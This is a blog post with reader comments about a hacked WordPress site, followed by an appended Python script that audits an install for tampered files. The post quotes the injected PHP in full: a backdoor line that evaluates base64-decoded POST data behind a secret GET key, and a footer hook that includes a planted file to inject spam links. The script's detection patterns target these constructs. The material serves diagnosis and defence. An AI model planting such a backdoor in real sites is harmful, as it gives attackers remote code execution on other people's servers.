Blog error
This blog appeared to be down for some time today. It appeared that somehow the default_filters.php file in Wordpress got some corruption. Replacing it with the default file from a Wordpress 2.3.1 download solved the problem. Google hasn’t thrown up anything that throws any light on the problem. The corrupted file had a timestamp of today and contained some additional stuff over and above the default file content, such as:
This was declared at the top of the file:
if($_GET['0cc9b18defb8385c']=="1a84882ba2eb254c"){ eval(base64_decode($_POST['file'])); exit; }
Then there was this add_action function:
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
shuffle($wparr);
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "“.ucwords($v['key']).”\n”;
if($i++==$inum) break;
}
echo "!/div!".$_footer;
}
}
And this at the bottom:
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "“.ucwords($v['key']).”\n”;
if($i++==$inum) break;
}
echo "!/div!".$_footer;
}
}
(N.B. !div! is an HTML DIV tag but this causes problems if I embed it in the post)
Which is obviously trying to declare the same function ‘wpc7c16b8466d864eeefd20050625c7775’ twice (which the error message identified). I have no idea what was inserting this code, so I’ve left it all out for the time being. I suspect it may be a badly behaving plugin, so apologies if some aspect of the blog doesn’t work correctly. If anybody has any ideas I’d love to hear them.

Looks to me like your blog got hacked and that is the code for a backdoor…
The first line looks like it allows someone to load a file into your blog via an HTTP POST, which means they can do whatever they want.
I would change passwords on the blog and start checking for other security problems - That code is not benign!
Comment by Anton Piatek — December 1, 2007 @ 4:23 pm
Unfortunately it looks like you are right. class-mail.php isn’t part of Wordpress and seems to have been inserted into my wp-includes directory somehow, probably by the method you highlight. How somebody got the backdoor in in the first place is unknown. There is nothing to suggest that they gained access to the filesystem on my host (and no, it isn’t world-writable either).
The contents of class-mail.php contained the assignment of two variables to the contents of a couple of Base64-encoded strings. One contained a load of binary data and some links to an innocuous-looking web site blog at digitalsweeties.com. The second decoded into a JavaScript function to display an ad from googlesyndication.com.
Looks like it has happened to others as well, and is probably an exploit of a Wordpress vulnerability.
Comment by Adrian Spender — December 1, 2007 @ 5:14 pm
Edited to add. This happened well after I recently upgraded to Wordpress 2.3.1 as well!
Comment by Adrian Spender — December 1, 2007 @ 5:15 pm
Eek. Well I assume that WP.com blogs are not vulnerable to whatever backdoor these folks found.
Comment by Andy Piper — December 13, 2007 @ 4:31 am
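The checks this thread arrived at by hand (a core file that no longer matches the clean download, a file that is not part of the release at all, and the tell-tale constructs in the injected code) can be run across a whole install. The script below is an added example, not code from the post or from WordPress; it assumes a clean copy of the same release is unpacked next to the live install, and the names audit and demo, the finding labels and the sample trees are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics taken from the injected code quoted in the post; not a complete signature set.
SUSPICIOUS = {
    "eval-of-request-data": re.compile(
        rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)", re.I),
    "silenced-include": re.compile(rb"@\s*include(?:_once)?\b", re.I),
}
FUNC_DEF = re.compile(rb"^\s*function\s+&?\s*([A-Za-z_]\w*)\s*\(", re.M)

def audit(install_dir, clean_dir):
    """Return (relative path, finding) pairs for PHP files that differ from a clean copy."""
    install, clean = Path(install_dir), Path(clean_dir)
    findings = []
    for path in sorted(install.rglob("*.php")):
        rel = path.relative_to(install).as_posix()
        ref = clean / rel
        data = path.read_bytes()
        if not ref.is_file():
            findings.append((rel, "not-in-clean-release"))
        elif data != ref.read_bytes():
            findings.append((rel, "modified"))
        else:
            continue  # byte-identical to the reference copy, nothing more to inspect
        findings += [(rel, name) for name, rx in SUSPICIOUS.items() if rx.search(data)]
        names = [n.lower() for n in FUNC_DEF.findall(data)]  # PHP function names ignore case
        for dup in sorted({n for n in names if names.count(n) > 1}):
            findings.append((rel, "duplicate-function:" + dup.decode()))
    return findings

def demo():
    """Run the audit over two small constructed trees (sample data, not the real files)."""
    clean_src = b"<?php\nadd_filter('the_title', 'trim');\n"
    hook = b"function wp_constructed_hook() {\n@include('./wp-includes/class-mail.php');\n}\n"
    tampered = (b"<?php\nif($_GET['k']=='v'){ eval(base64_decode($_POST['file'])); exit; }\n"
                + clean_src[6:] + hook + hook)
    with tempfile.TemporaryDirectory() as tmp:
        for tree, body in (("clean", clean_src), ("install", tampered)):
            inc = Path(tmp, tree, "wp-includes")
            inc.mkdir(parents=True)
            (inc / "default_filters.php").write_bytes(body)
        Path(tmp, "install", "wp-includes", "class-mail.php").write_bytes(b"<?php $wparr = array();\n")
        return audit(Path(tmp, "install"), Path(tmp, "clean"))

if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{finding:45} {rel}")
```

Files that match the reference byte for byte are skipped, so the pattern checks only run on files that are already known to be changed or foreign; legitimate plugins and themes will show up as not-in-clean-release and need their own reference copies.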